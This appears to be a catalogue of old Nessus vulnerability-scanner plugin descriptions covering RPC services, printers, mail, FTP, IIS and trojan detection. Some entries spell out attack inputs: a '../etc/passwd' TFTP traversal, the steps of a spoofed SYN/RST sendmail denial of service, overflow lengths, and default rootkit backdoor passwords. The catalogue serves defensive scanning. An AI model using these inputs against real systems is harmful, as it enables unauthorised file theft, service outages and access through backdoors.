Attack | Bootparamd gives NIS domain | | When a diskless client needs to boot, it uses the bootparam protocol to get the necessary information from the server. If bootparamd is running, one can guess which is the client and which is the server, or use a program such as bootparam_prot.x to determine which is which. If an intruder uses BOOTPARAMPROC_WHOAMI and provides the address of the client, he will get its NIS domain name back from bootparamd. If you know the NIS domain name, it may be possible to get a copy of the password file. One solution would be to filter incoming connections to port 111 (portmap). This plugin will attempt to retrieve the NIS domain name by giving some computer names to the remote bootparamd. Risk factor : High | no copyright
Attack | pfdispaly | determines the presence of the 'wrap' cgi | WWW HTTP/1.0 Server, as shipped with IRIX 6.2 (at least on low-end machines), includes a perl script (wrap) which allows anyone on the net to get a listing of any directory with mode +755. Risk factor : medium/high | found by J.A. Gutierrez
Attack | llockmgr service | | | no copyright
Information gathering | rexecd check | checks for the presence of the rexec service | Because rexec uses unprivileged ports for the whole process, any user can send a request to a rexecd requesting connection of the stderr stream to an arbitrary port on the client machine. Since the client is unprivileged, there is no possibility for the legitimate stderr stream to be destined for a privileged port. In addition, spoofing techniques could allow the client to direct the stderr stream towards an arbitrary host as well as an arbitrary port, possibly exploiting a given trust model. Since rexecd terminates if the stderr port can't be connected to, and the port can be specified, rexecd can be used to easily scan the client host from the server host. Risk factor : medium | Licensed under the GPL
Attack | 3270 mapper service | | | no copyright
Attack | Etherstatd service | | | no copyright
Attack | nsed service | | | no copyright
Attack | nsemntd service | | | no copyright
Attack | ypupdated service | | | found by Avalon Security Research
Attack | database service | | | no copyright
Attack | alis service | | | no copyright
Attack | keyserv service | | | no copyright
Attack | nlockmgr service | | | no copyright
Attack | statmon service | | | no copyright
Attack | rexd service | | | no copyright
Attack | rje_mapper service | | | no copyright
Attack | rquotad service | | | no copyright
Attack | rstatd service | | | no copyright
Attack | rusersd service | | | no copyright
Attack | sched service | | | no copyright
Attack | selection service | | | no copyright
Attack | sprayd service | | | no copyright
Attack | showfhd service | | | no copyright
Attack | Sunlink mapper service | | | no copyright
Attack | tfsd service | | | no copyright
Attack | walld service | | | no copyright
Attack | ypxfrd service | | | no copyright
Attack | yppasswdd service | | | no copyright
Attack | ypbind service | | | no copyright
Attack | X25 service | | | no copyright
Attack | SNMP service | | | no copyright
Information gathering | icmp timestamp request | | | licensed under the GPL
Information gathering | icmp netmask request | | | licensed under the GPL
Denial of Service | iParty | shuts down a remote iParty server | iParty is an audio/text chat program for Windows. The iParty server listens on a specified port (6004 is the default) for client requests. If someone connects to the chat server and sends a large amount of ASCII 255 chars, the server will simply close itself and disconnect all the current users. Risk factor : Low/Medium | found by HD Moore
Information gathering | HP Laserjet printer has no password | notifies the user that the remote printer has no password | This plugin attempts to see if the remote HP Laserjet printer has a password. A passwordless printer is a threat since it allows an attacker to change the printer's IP, thus creating network problems. | no copyright
Information gathering | HP JetDirect TCP/IP problems: single thread | checks if anyone can cause a DoS of the printer via the single-threaded architecture of the printer | See the ISS Security Advisory of the same name. Basically, the older JetDirect interfaces have several problems. One of them is the fact that the HP JetDirect is single-threaded, so when one of the ports is occupied, the other ports are unavailable. The consequence of this problem is that the printer can't properly emulate the spooler characteristics. This can allow a malicious user to prevent other people from printing their work. Risk factor : Low | based on the ISS Security Advisory of the same name
Information gathering | HP JetDirect TCP/IP problems: display hack | attempts to write 'Nessus succeeded' on the remote printer LCD | It is sometimes possible to hack the display of a JetDirect printer, thus making it write any text. This can be used by attackers in a social engineering attack: first, write a 'hotline' phone number on the printer, then make the printer crash (using some well known methods tested by Nessus). This plugin attempts to write 'Nessus succeeded' on the printer display, but it can not check if it succeeds, so you will have to check by yourself. Risk factor : Low | Based on the exploit by Silicosis sili@l0pht.com
Attack | Linux TFTP get file | Attempts to grab a file through a bug in some versions of tftp | There is a faulty access control implementation in some versions of the Linux tftp daemon. Most current tftpd implementations attempt to restrict access to files outside of the tftproot directory. The Linux implementations disallow any files with /../ in their pathnames, however one can still access files such as /etc/passwd by prepending ../ in front of the pathname (../etc/passwd). This will work since the current directory for tftpd is usually /ftpchr. Risk factor : high | no copyright
Denial of Service | icmp redirect | | | licensed under the GPL
Denial of Service | smad | Prevents Sendmail from working properly | Sendmail accepts DoS attack. This Linux-specific attack allows anyone to prevent sendmail from working properly. In fact the simple algorithm proposed by Michal Zalewski can be performed in this way: 1. Attacker sends SYN from port X to victim, dst_port=25, spoof_addr SPOOFHOST (victim sends SYN/ACK to SPOOFHOST). 2. SPOOFHOST sends RST from port X to victim, dst_port=25, respecting sequence numbers (in reply to the SYN/ACK from victim). (victim gets an error on accept() - and enters 5 sec 'refusingconn' mode) 3. Wait approx. 2 seconds. 4. Go to 1. This attack also works when SPOOFHOST = victim. Risk factor : Medium/High | original code by Salvatore Sanfilippo [AntireZ]
Information gathering | NetBus | detects if NetBus is running on the remote host | NetBus is a trojan horse designed to take control of a Win 95/98/NT computer. This plugin detects if it is installed... Risk factor : medium/high | no copyright
Information gathering | BackOrifice | detects if BackOrifice is running on the remote host | BackOrifice is a Windows 95/98 Trojan usually listening on the UDP port 31337, designed to take control of the infected computer. This plugin determines if BO is running on the ports 31337 and 53. Risk factor : medium/high | no copyright
Attack | ftp PASV on connect crashes the FTP server | issues a PASV command upon the connection | Some FTP servers dump core when they are issued a PASV command as soon as the client connects. The FTP server will write a world readable core file which contains portions of the shadowed password file. This flaw allows local users to obtain the shadowed password file. Risk factor : medium/high | no copyright
Attack | shell interpreter | determines if there are executable shells in the remote cgi-bin/ | Leaving executable shells in the cgi-bin directory of the remote web server can enable users to execute arbitrary commands on the target machine as the UID of the web server. This check looks for the following shells in your cgi-bin directory: ash bash csh ksh sh tcsh zsh. Risk factor : High | no copyright
Information gathering | finger redirection check | checks whether the remote finger accepts requests like user@host1@target | This plugin attempts to bounce a remote finger request through the target-host finger daemon. A request of the form user@host2@target is made. If your finger daemon allows this kind of request, your host may be used by an attacker as a relay to gather information about a third-party host. Solution : disable your finger daemon or replace it with a more secure one. | no copyright
Attack | Netscape FastTrack 'get' | determines if the remote web server dumps the listing of / when issued the 'get' command | When some versions of the Netscape FastTrack server are issued a lower-cased 'GET' command, they happily return the file listing of the current directory, rather than displaying the 'index.html' file of the directory. This vulnerability may help intruders to find out files that are normally hidden. Risk factor : Low/Medium | no copyright
Information gathering | finger backdoor check | determines if the remote fingerd is a trojan | A widely distributed backdoor fingerd is used by script kiddies to maintain their accounts. Basically, this daemon recognizes several commands: cmd_adduser, cmd_stealth, cmd_deluser, cmd_rootsh, cmd_cleanup. Nessus will try the command 'cmd_rootsh' to determine if the remote finger daemon is a trojan. If it is a trojan, it means that your system has been compromised, so you will have to double check its config. Risk factor : High | no copyright
Attack | RootKit | tries to log in to the remote system using the default RootKit password | 'RootKit' is the name of a popular set of SunOS utilities that are used by hackers to backdoor a compromised host. This plugin attempts to check if this kit has been installed by trying the default username and password, which is root/D13HH[ | no copyright
Attack | Hidesource | tries to log in to the remote system using the default Hidesource password | 'Hidesource' is the name of a popular set of SunOS utilities that are used by hackers to backdoor a compromised host. This plugin attempts to check if this kit has been installed by trying the default username and password, which is wank/wank | no copyright
Attack | Hidepak | tries to log in to the remote system using the default Hidepak password | 'Hidepak' is the name of a popular set of Solaris utilities that are used by hackers to backdoor a compromised host. This plugin attempts to check if this kit has been installed by trying the default username and password, which is wank/wank | no copyright
Information gathering | FSP Daemon | Checks if the remote host has a running FSP daemon | This plugin checks whether a host is running an FSP daemon. FSP is a file transfer protocol similar to FTP which uses UDP to transport files. FSP is widely used by attackers to move files from host to host. It is also used widely by software pirates to allow easy access to caches of illicit software. If Nessus discovers that you are running an FSP daemon, you should check for evidence of break-ins into the remote system. Risk Factor : Medium | Based on the code of Wen-King Su (wen-king@vlsi.cs.caltech.edu)
Attack | Solaris Automountd exploit | Checks if automountd is enabled | There is a flaw in the Solaris rpc.statd and automountd which may allow an intruder to execute any command remotely as root. This plugin warns the user that automountd is enabled but **DOESN'T TEST IF THE VULNERABILITY IS PRESENT**. Risk factor : High | written after the advisory of Corruptio Optimi Pessima
Attack | mSQL DBname remote exploit | overflows a buffer in the remote msql server | The mysqlInit() function can be passed too long args, which will cause a buffer overflow which may allow remote users to gain a shell remotely. mSQL v1.0.xx -> Vulnerable to the whole range of exploitation (arbitrary commands) and denial of service (debug and dbname). mSQL v2.0.2 and prior -> Vulnerable to exploitation (arbitrary commands) and denial of service (debug and dbname). mSQL v2.0.3 and above -> Not vulnerable to the exploitation vulnerability (arbitrary commands) but still vulnerable to Denial of Service (debug and dbname). Risk factor : Medium/High | Sekure SDI Secure Coding Team
Attack | mSQL debug remote exploit | overflows a buffer in the remote msql server set to debug mode | An attacker may use mSQL to gain a shell remotely when the environment variable MSQL_DEBUG (for version 2.0) or MINERVA_DEBUG (for version 1.0) is set. mSQL v1.0.xx -> Vulnerable to the whole range of exploitation (arbitrary commands) and denial of service (debug and dbname). mSQL v2.0.2 and prior -> Vulnerable to exploitation (arbitrary commands) and denial of service (debug and dbname). mSQL v2.0.3 and above -> Not vulnerable to the exploitation vulnerability (arbitrary commands) but still vulnerable to Denial of Service (debug and dbname). Risk factor : Medium/High | Sekure SDI Secure Coding Team
Information gathering | Sendmail redirection attack | checks if specific message routing can be performed | Due to a strange address parsing policy [briefly: if the address ends with the local hostname, trim it and parse it as any other (even if after this operation the address isn't 'local' anymore)], specific message routing (eg. through internal, protected or external networks) can be forced, giving an occasion to perform anonymous scanning (or fakemailing). You could call it a 'feature' instead of a 'bug', but it seems to be Sendmail-specific ;> Simple fix - in /etc/sendmail.cf, at the top of ruleset 98, insert the following line: R$*@$*@$* $#error $@ 5.7.1 $: "551 Sorry, no redirections." Risk factor : Low/Medium | Michal Zalewski
Attack | Microsoft Personal Web Server '.....' | Attempts to get the root listing of the remote web server | It is possible to list and download any file on a remote Windows 95 host that has MS PWS installed by requesting '......', which will list the root directory. Risk factor : high | discovered by Sean Coates
Denial of Service | Lotus Notes MTA dos | makes the Lotus MTA crash | It is possible to crash the Lotus Notes MTA by sending it two HELO commands, both on the Solaris and Windows platforms. An attacker can prevent incoming mail from being delivered. Risk factor : Medium/High | found by Siva Sankar Adiraju
Denial of Service | IIS ftp server crash | crashes an IIS ftp server | It is possible to make the IIS FTP server close all the active connections by issuing a too long NLST command, which will make the FTP server crash. An attacker can use this to prevent people from downloading anything from your FTP server. Risk factor : medium | no copyright
Denial of Service | oshare | crashes a Win98 computer | It is possible to crash a Windows 98 computer by sending it a badly formed packet. This plugin implements the oshare attack, the details of which can be found in the BugTraq archive. Risk factor : High | original code by R00t Zer0
Attack | ExAir possible DoS | determines the presence of some ExAir scripts | This plugin is for those that have Internet Information Server 4 installed with the IIS sample site "ExAir". There are three Active Server Pages that, if called directly without the default ExAir page and associated dlls ever having been loaded into the IIS memory space, will hang and eventually time out after 90 secs - the default script timeout period. Whilst in this state, processor usage increases to 100% and the server becomes very sluggish. This plugin does not perform this denial of service attack. Risk factor : High | mnemonix
Attack | Perl.exe and IIS security | attempts to find the location of the remote web root | There is a problem with perl.exe similar to the issue discussed in KB article Q193689 where the physical disk location of a virtual web directory can be ascertained. In all versions of IIS, where a website has been configured to interpret perl scripts using the perl executable (perl.exe), a problem exists where a request for a non-existent file will return the physical location on disk of a web directory. This may be of some interest to attackers, who gain more knowledge about the attacked target. Risk factor : Low | mnemonix
Attack | IIS /scripts directory browsable | checks whether the remote /scripts/ directory is browsable | This plugin checks whether the remote server's /scripts directory is browsable or not. A browsable scripts directory will allow an attacker to search for potentially vulnerable scripts more efficiently, and to test your home-made scripts too. Risk factor : Medium | distributed under the GPL
Attack | slmail HELO buffer overflow | buffer overflow for the SLMail SMTP server | The SLMail service listens on several ports, one of which is 27, which provides SMTP services in addition to port 25. On this port, issuing a HELO command with an argument longer than 855 chars will cause a buffer overflow which may allow an attacker to execute arbitrary code on the remote host. Risk factor : High | no copyright
Denial of Service | slmail:27 VRFY overflow | buffer overflow for the SLMail SMTP server | The SLMail service listens on several ports, one of which is 27, which provides SMTP services in addition to port 25. On this port, issuing a VRFY command with an argument longer than 855 chars will make the remote server crash. Risk factor : High | no copyright
Denial of Service | Router Access Port DoS | performs a denial of service against the remote router | It is possible to disable the TCP access / configuration ports on most routers by shoving a few thousand bytes of any character down the connection to ports 23, 2001, 4001, 6001 and 9001. Some routers have to be reset manually while others will need from 30 seconds to several days to recover. An attacker can use this weakness to bring down a part of, or even your whole, network. Risk factor : High | HD Moore
Attack | unfsd bug | Attempts to guess the file handle of the remote root fs | There is a security problem in unfsd version 2.0 and earlier which allows an attacker to guess the file handle of the root filesystem by trying reasonable combinations of device and inode number in succession and attempting to get its attribute handle from the server. If this is successful, it means that an attacker may mount your exported filesystems easily. Risk factor : High | O. Kirch
Information gathering | Sendmail Relaying | checks whether sendmail can do relaying | This plugin determines whether your sendmail server can be used as a mail relay. If it can, then it may be subject to spammers who can then relay their mails. Mail relaying is bad because it overloads your server, since spammers usually send thousands of mails. Risk factor : low | no copyright
Information gathering | TCP Chorusing | | | bug described by Dan Kaminsky